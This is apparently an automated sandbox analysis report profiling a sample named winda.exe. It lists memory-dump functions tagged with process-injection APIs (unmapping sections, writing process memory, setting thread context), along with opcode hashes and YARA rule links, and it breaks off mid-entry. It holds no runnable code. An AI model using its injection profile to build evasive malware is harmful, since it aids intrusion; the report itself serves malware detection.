                                                      Function 00007FFC0882B0E0, Relevance: 1.6, APIs: 1, Instructions: 112threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 431b07f72eacafe2af228346b4b729cf9204e5827daf6027365f58343a4c4948
                                                      • Instruction ID: bbbc689b079efc617b013a1c67f35de8d905194afc12fe78fe2858e163de6c20
                                                      • Opcode Fuzzy Hash: 431b07f72eacafe2af228346b4b729cf9204e5827daf6027365f58343a4c4948
                                                      • Instruction Fuzzy Hash: 1D31093190CB5C8FDB29DB68980A6F97BE0EF55331F00417FE04AC3692DE64680ACB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0882AEE5, Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.352100032.00007FFC08820000.00000040.00000001.sdmp, Offset: 00007FFC08820000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: ac315abe0ee31e710f9e086cdea9fce1f5145f8d9f9fb5dcd7d4281cde2b7360
                                                      • Instruction ID: 1d36f175c81ce4c98811b3a7d17260fbea6135e4ed93017e08aa1f6aa839832c
                                                      • Opcode Fuzzy Hash: ac315abe0ee31e710f9e086cdea9fce1f5145f8d9f9fb5dcd7d4281cde2b7360
                                                      • Instruction Fuzzy Hash: 4631E33190C65C8FDF59DF6898496F97BE0EF96320F04816FD04DC7292DA78580ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: winda.exe PID: 6604 Parent PID: 3352 winda.exeCOMMON

                                                      Executed Functions

                                                      Function 00007FFC0883B3EC, Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: f9b585220277f37bdafc8ce6d47d0be2d8bd865f2d042cbcca0eade48a540bd1
                                                      • Instruction ID: 8f5b1c521abd2ee2bcccf1fa4447105e02568a9f9e51d0509f31ca55fa5b6973
                                                      • Opcode Fuzzy Hash: f9b585220277f37bdafc8ce6d47d0be2d8bd865f2d042cbcca0eade48a540bd1
                                                      • Instruction Fuzzy Hash: 5B31E93190CB5C4FDB19EB68980A6F97BE0EF56321F04417FD04AC3192DE65640ACB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883804F, Relevance: 2.2, APIs: 1, Instructions: 703libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 4c84b389d140f92a1a1e932728ea790a6805fb18c3f6059916aab542698a9db4
                                                      • Instruction ID: bb0e40237568c7e7ded6dea7d6e4f98842cf7d572625a08c5484b444147b329f
                                                      • Opcode Fuzzy Hash: 4c84b389d140f92a1a1e932728ea790a6805fb18c3f6059916aab542698a9db4
                                                      • Instruction Fuzzy Hash: 9F61B37090D78C8FDB46DB6888657A87FB1FF57310F0542EBD049CB2A3DA685849CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883B4D0, Relevance: 1.9, APIs: 1, Instructions: 394processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: a7833dc9e0f886af70c52399e33cda1f7dfef24d5170c4fbeadd07fb91dcc644
                                                      • Instruction ID: b7770f20bdf4f1399a792468e62689f448df9753a355a0d4c7a1c179a3bb4e7b
                                                      • Opcode Fuzzy Hash: a7833dc9e0f886af70c52399e33cda1f7dfef24d5170c4fbeadd07fb91dcc644
                                                      • Instruction Fuzzy Hash: 20C1907091CA8D8FEB64DF28D8467E977D1FB58310F10826AD84EC7281DB74A945CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883D7FC, Relevance: 1.7, APIs: 1, Instructions: 244COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: BaseModuleName
                                                      • String ID:
                                                      • API String ID: 595626670-0
                                                      • Opcode ID: 68de46f79da832d18e3712598f880f3893f58055eb66029e4b76df4dedcd7f62
                                                      • Instruction ID: cabcf5a13bd1ca63ef5e5c65dd37a2048d2ac46658932f671dc5281410b690af
                                                      • Opcode Fuzzy Hash: 68de46f79da832d18e3712598f880f3893f58055eb66029e4b76df4dedcd7f62
                                                      • Instruction Fuzzy Hash: 6971913050CA8D8FDB68DF288845BB97BE1FF55315F04826EE84DC7292DB35A846CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883AFB8, Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c24a44c3c3007de4ae7d5dc9b315b925d93296eade0867cd017787e210cc9552
                                                      • Instruction ID: a2890149c68cf6c1c6d105c9a3f2b633f120a129ab31387d8067ac8d4aec78d8
                                                      • Opcode Fuzzy Hash: c24a44c3c3007de4ae7d5dc9b315b925d93296eade0867cd017787e210cc9552
                                                      • Instruction Fuzzy Hash: B3512C7190CB584FEB29DB6898056F97BE1EF56320F04427FD089C71D2DB78640ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08830A50, Relevance: 1.7, APIs: 1, Instructions: 159memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 5b69b4af65d6f06531cde7b644a0185fb5eb0cf789a4a9ee15cbeb415bd2771a
                                                      • Instruction ID: 9b37394aea3032a9152248a9f468c4a96523436f998acb4cc9d4c9d861e7d184
                                                      • Opcode Fuzzy Hash: 5b69b4af65d6f06531cde7b644a0185fb5eb0cf789a4a9ee15cbeb415bd2771a
                                                      • Instruction Fuzzy Hash: C5413B7190DA984FE718D79C98056797FF0EF56311F0482BFD049C31D7CA24A80AC3A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883DCD0, Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID:
                                                      • API String ID: 3555792229-0
                                                      • Opcode ID: c57e911a004321f3297eeb63e3ac0e38948ffbc59e33b27c2ae11ffdfe5a8b9f
                                                      • Instruction ID: 46875d0e2f8e121ce207fbbcca27655703040fc54d62976ab043a389b869ae76
                                                      • Opcode Fuzzy Hash: c57e911a004321f3297eeb63e3ac0e38948ffbc59e33b27c2ae11ffdfe5a8b9f
                                                      • Instruction Fuzzy Hash: 0141E93090CB988FE71ADB789856AB97FF0EF56311F1441AFD08AC71D3DA646806CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08830A60, Relevance: 1.7, APIs: 1, Instructions: 154memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: fce00d3a4635ca43203568530ab75f17e2c3d9fecd3af3c55155c5c707e7065b
                                                      • Instruction ID: 60f741ea56f208505c35c35d68d138d715cdae91f1431ccbc4edf9a91a8561ac
                                                      • Opcode Fuzzy Hash: fce00d3a4635ca43203568530ab75f17e2c3d9fecd3af3c55155c5c707e7065b
                                                      • Instruction Fuzzy Hash: 94410A7190DA984FD718DBAC98056B97FF0EF56311F0442BFD149C31D3CA64A846C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088391C8, Relevance: 1.6, APIs: 1, Instructions: 144fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: CopyFile
                                                      • String ID:
                                                      • API String ID: 1304948518-0
                                                      • Opcode ID: 4be230e5ff9eae1fd308686268b0a8ade150bce11242bfe5494a19078903d6ec
                                                      • Instruction ID: 157502a821c07fd1145877f8504a2b83035e3f02b1d372277ecb6d6227a31333
                                                      • Opcode Fuzzy Hash: 4be230e5ff9eae1fd308686268b0a8ade150bce11242bfe5494a19078903d6ec
                                                      • Instruction Fuzzy Hash: 7041163080CB588FD719CF6898556F97FF0EF56321F0442AFD08AD7192CA786809CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883D6D6, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: EnumModulesProcess
                                                      • String ID:
                                                      • API String ID: 1082081703-0
                                                      • Opcode ID: ce094680b851ab5b5a3c5bb5b78e958f41414aeb32c0580cd94f9dceaaf26ce8
                                                      • Instruction ID: 0ac6b21ac634c58c2f4a472821f46cbc65131aa640719221622ec9ca17b551c7
                                                      • Opcode Fuzzy Hash: ce094680b851ab5b5a3c5bb5b78e958f41414aeb32c0580cd94f9dceaaf26ce8
                                                      • Instruction Fuzzy Hash: EB41063190CB8C8FDB199B6898066F9BBE0EF56721F04436FD049C3292DF746846C791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883880D, Relevance: 1.6, APIs: 1, Instructions: 137memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 80ae83a0dda3abf4f7a46ac9ad2edcf5bcbbfd3282a67018e302684370fae774
                                                      • Instruction ID: a77323d2bb6ae5416a46c16c507fa4223bfa63efc9585468f5b287372cfc1d05
                                                      • Opcode Fuzzy Hash: 80ae83a0dda3abf4f7a46ac9ad2edcf5bcbbfd3282a67018e302684370fae774
                                                      • Instruction Fuzzy Hash: 2541163090CB888FDB19DB689855AB9BFF1EF56321F0442AFD089C35D2CB646846C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883B2D0, Relevance: 1.6, APIs: 1, Instructions: 136injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: ae67a229f64ba423b6accc8054c1c25bd0f442921b9d19f2643f07c41585d146
                                                      • Instruction ID: bcb84b6ba5c2c64eba9624a97516bf659ed832c81f388cf8e388f8025204ad0b
                                                      • Opcode Fuzzy Hash: ae67a229f64ba423b6accc8054c1c25bd0f442921b9d19f2643f07c41585d146
                                                      • Instruction Fuzzy Hash: C541C37190CA5C8FDB18DB5898066F9BBE1EB55320F04426FE04DD3292DF64A846CBD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08830A90, Relevance: 1.6, APIs: 1, Instructions: 131memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 00aab71434f0acad2773c1b37f9190d9bd0da43b90d8546a200ee66b6ce49a31
                                                      • Instruction ID: e0101a0af0232d71a7c2a7afe1582ac49990c3be8daafb551f7d5275ed975916
                                                      • Opcode Fuzzy Hash: 00aab71434f0acad2773c1b37f9190d9bd0da43b90d8546a200ee66b6ce49a31
                                                      • Instruction Fuzzy Hash: 2441267190CB9C8FDB18DBA898496B9BBF1EB55311F04827FD049C3193CB64A84AC796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883B1C8, Relevance: 1.6, APIs: 1, Instructions: 130memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: a95808a5c2695153fe86e76ccc093bf131491a68ce5cd6072bf7b305294db148
                                                      • Instruction ID: fbc0c6604de7cfa59b88b48245b22422a50455ef50dcc7bc6e66d7b252ed404f
                                                      • Opcode Fuzzy Hash: a95808a5c2695153fe86e76ccc093bf131491a68ce5cd6072bf7b305294db148
                                                      • Instruction Fuzzy Hash: 5131E53190CA4C8FDB19AB689806AF97BE1EB55320F00436FE049C3292DE746856CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08830AA0, Relevance: 1.6, APIs: 1, Instructions: 127memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 5d6fc3e304a652da6f8d9ff2d505f2419f1e0505da628ac47317aeb036ffc8a6
                                                      • Instruction ID: 2a54fc3fbd3d0b155cfedf29fc7de2e8dca9528f436d54a85aca5e885e217900
                                                      • Opcode Fuzzy Hash: 5d6fc3e304a652da6f8d9ff2d505f2419f1e0505da628ac47317aeb036ffc8a6
                                                      • Instruction Fuzzy Hash: D031287090CB9C8FDB18DB9C98456B9BBF1FB55311F04427FD049C3192CB60A846C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883D228, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: EnumProcesses
                                                      • String ID:
                                                      • API String ID: 84517404-0
                                                      • Opcode ID: 7baf84c2a627e733f8ee0cfcdb3e7f42a857a880a74232cfedd7054f6f3920f6
                                                      • Instruction ID: 9bd7cfa2e48167749e01f80771ca5921b5975286b28f9da7a731e57b478e73c6
                                                      • Opcode Fuzzy Hash: 7baf84c2a627e733f8ee0cfcdb3e7f42a857a880a74232cfedd7054f6f3920f6
                                                      • Instruction Fuzzy Hash: 2E31803190CB5C8FDB28DF9D9855AF97BE0EB65321F00416FE04AD3691CA74A849CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883DA76, Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: b1f6200bbe4a7e6adfa0eec79e5080401f27631aff964a7ef79a87e3b0a12dc9
                                                      • Instruction ID: 55cb3c9c528b12751be59b498777bfb27d92201b64199b2293da43f4813ba27f
                                                      • Opcode Fuzzy Hash: b1f6200bbe4a7e6adfa0eec79e5080401f27631aff964a7ef79a87e3b0a12dc9
                                                      • Instruction Fuzzy Hash: 67311A3190C68D8FDB19DB689805BE97BF0EF56320F04426FD049C35D2DA646856CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08830AB0, Relevance: 1.6, APIs: 1, Instructions: 121memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: fac403f00a8e80f9e8a72a56b98e79724b2a660d5c8a1f193eac940fc8b4daed
                                                      • Instruction ID: 6e0515977f49639ca35f866a8196018eafdef35a45c343c6c7859c10865d45e1
                                                      • Opcode Fuzzy Hash: fac403f00a8e80f9e8a72a56b98e79724b2a660d5c8a1f193eac940fc8b4daed
                                                      • Instruction Fuzzy Hash: 8631E53090CA5C8FDB18DB9C9849AB9BBF1EB95311F04427FD04AD3692CB74A846C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883B0E0, Relevance: 1.6, APIs: 1, Instructions: 112threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 07c58b2597d105f1a9910dbf1fdb05b8cfee6aea195dfa72a76190aed38d9515
                                                      • Instruction ID: 4678e8f6aa41055593a246d4c3902ac1973f69b031204196de66277d1316fa14
                                                      • Opcode Fuzzy Hash: 07c58b2597d105f1a9910dbf1fdb05b8cfee6aea195dfa72a76190aed38d9515
                                                      • Instruction Fuzzy Hash: 8E31FB31D0CB5C8FDB28DB6998066F97BE1EF55321F00427FD04AD3592DE68644ACB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0883AEE5, Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000009.00000002.446502967.00007FFC08830000.00000040.00000001.sdmp, Offset: 00007FFC08830000, based on PE: false
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: b864ab050b9ae243abc3a0c5f54a6492e9ff617230ade901369c7e2eaa2cc03c
                                                      • Instruction ID: 8731956afd4bf31fc2aac1296ac4bd09df64a711ccc5ad61c4d3f52c6b9e5723
                                                      • Opcode Fuzzy Hash: b864ab050b9ae243abc3a0c5f54a6492e9ff617230ade901369c7e2eaa2cc03c
                                                      • Instruction Fuzzy Hash: 3B31033190CA5C8FDF59DF689846AF97BE0EF56320F04816FD04DC7292DA78580ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: winda.exe PID: 6788 Parent PID: 3352 winda.exeCOMMON

                                                      Executed Functions

                                                      Function 00007FFC0884B3EC, Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: SectionUnmapView
                                                      • String ID:
                                                      • API String ID: 498011366-0
                                                      • Opcode ID: a620215ace27f34a39b61c7a2fbfa7b9cf31e814884dd51434f1e8c29c6dcdf6
                                                      • Instruction ID: 2de4112318f8059e9a20739fa499083e53ee6fddd8fd4f5a1910e4b9ca386f26
                                                      • Opcode Fuzzy Hash: a620215ace27f34a39b61c7a2fbfa7b9cf31e814884dd51434f1e8c29c6dcdf6
                                                      • Instruction Fuzzy Hash: 1031E93190CB584FDB19EBA8980A6F97BE0EF56321F04417FD04EC3592DE65640ACB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884804F, Relevance: 2.2, APIs: 1, Instructions: 703libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 2c9d88961e5399471ece8c631657cd8a12f5ba38be62e18968d3d779e9d7d493
                                                      • Instruction ID: ac35641670477ada44950e065dcb5a1ec904f9f72a0ebe9771fb6d27c6414180
                                                      • Opcode Fuzzy Hash: 2c9d88961e5399471ece8c631657cd8a12f5ba38be62e18968d3d779e9d7d493
                                                      • Instruction Fuzzy Hash: 8F61937090D78C8FDB46DB6888657A8BFB1EF57310F0542EBC049DB2A3DA685846CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884B4D0, Relevance: 1.9, APIs: 1, Instructions: 394processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: d9609b34869fc165f84e986c28985500c0d8ffc9c55eb6608ae6ce1988b24e4b
                                                      • Instruction ID: 238764dbca8ba939f690b6e1a210ec408951c75f5c2fb7657877574966ff9926
                                                      • Opcode Fuzzy Hash: d9609b34869fc165f84e986c28985500c0d8ffc9c55eb6608ae6ce1988b24e4b
                                                      • Instruction Fuzzy Hash: BEC18331918B8D8FEB64DF58D8467E977D1FB58310F10822AD84EC7281DE74E985CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884D7FC, Relevance: 1.7, APIs: 1, Instructions: 244COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: BaseModuleName
                                                      • String ID:
                                                      • API String ID: 595626670-0
                                                      • Opcode ID: 9f76b23209c15ea6f3b3d8dcd335a9456e5398fb2e630dbe03fc3c56833bee80
                                                      • Instruction ID: bb57f36b08197e76aac2e83928eaa4d94eb473911e1e9ffa8db510158009d580
                                                      • Opcode Fuzzy Hash: 9f76b23209c15ea6f3b3d8dcd335a9456e5398fb2e630dbe03fc3c56833bee80
                                                      • Instruction Fuzzy Hash: F5719031508A8D8FDB68DF28C845BF97BE0FF59311F04826AE84DC7292DB749846CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884AFB8, Relevance: 1.7, APIs: 1, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66d0cd6858490463019e29d67e3940abec5a841ac981d0bf2651807ce3a48d3c
                                                      • Instruction ID: 94fb27a8161a04c2cbb9b2d6d3bde7cbf056054d0cd494690adf3f23fa94750a
                                                      • Opcode Fuzzy Hash: 66d0cd6858490463019e29d67e3940abec5a841ac981d0bf2651807ce3a48d3c
                                                      • Instruction Fuzzy Hash: 5251297290C7584FEB29DBA898056F97BE0EF56320F04427FD049C7592DF78680ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08840A50, Relevance: 1.7, APIs: 1, Instructions: 159memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 7c511e40bfb3b9dc0066ee11080b7dfe3ae9eb40b21c0ac344791a42e53704e6
                                                      • Instruction ID: ba0a1d429fc830dec4c150d77a9f2c2c7c3d74f493bec9d14b76def0dfbbf7fc
                                                      • Opcode Fuzzy Hash: 7c511e40bfb3b9dc0066ee11080b7dfe3ae9eb40b21c0ac344791a42e53704e6
                                                      • Instruction Fuzzy Hash: B7413B7190DA984FEB19D79858056B9BFE0EB56311F0882BFD049C31D7CA64A806C3A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884DCD0, Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID:
                                                      • API String ID: 3555792229-0
                                                      • Opcode ID: fafc356c2c10ccd7a31da9373a1b8d1f9d582ee3cd06e2cc94e5da4e7f3cd4ae
                                                      • Instruction ID: e7685e15c467142783b0af14d01e40e3bf91210b99f8d16de5fae89bc1379ad2
                                                      • Opcode Fuzzy Hash: fafc356c2c10ccd7a31da9373a1b8d1f9d582ee3cd06e2cc94e5da4e7f3cd4ae
                                                      • Instruction Fuzzy Hash: 3D41E53190CB988FE71ADB6888166A97FF0EF56311F1441AFD08AC71D3DA656806CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC08840A60, Relevance: 1.7, APIs: 1, Instructions: 154memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 9c09df115c5658387fd8dca2db2601e4ae964cf041deed81fa321896246994c5
                                                      • Instruction ID: 3ffd58ed72ce39c12a371038ab0de311c4dd18e2951b9cebf16e7822ee730816
                                                      • Opcode Fuzzy Hash: 9c09df115c5658387fd8dca2db2601e4ae964cf041deed81fa321896246994c5
                                                      • Instruction Fuzzy Hash: D5412B7190DA984FD718DBA898056B9BFF0EB56311F0842BFD049C31D3CB64A846C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC088491C8, Relevance: 1.6, APIs: 1, Instructions: 144fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: CopyFile
                                                      • String ID:
                                                      • API String ID: 1304948518-0
                                                      • Opcode ID: ccc12febdfd7c9871d0729746ee462f11909f52149480a1982211f53af7f4ea5
                                                      • Instruction ID: db89046605f700b0b800c09a7ce706fd1869940ac74601dd86026f6b30af42af
                                                      • Opcode Fuzzy Hash: ccc12febdfd7c9871d0729746ee462f11909f52149480a1982211f53af7f4ea5
                                                      • Instruction Fuzzy Hash: 4E41F83180CB588FD729DF6898556FA7BF0EF56311F0441AFD08AC71A2DA786849CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00007FFC0884D6D6, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.465130118.00007FFC08840000.00000040.00000001.sdmp, Offset: 00007FFC08840000, based on PE: false
                                                      Similarity
                                                      • API ID: EnumModulesProcess
                                                      • String ID:
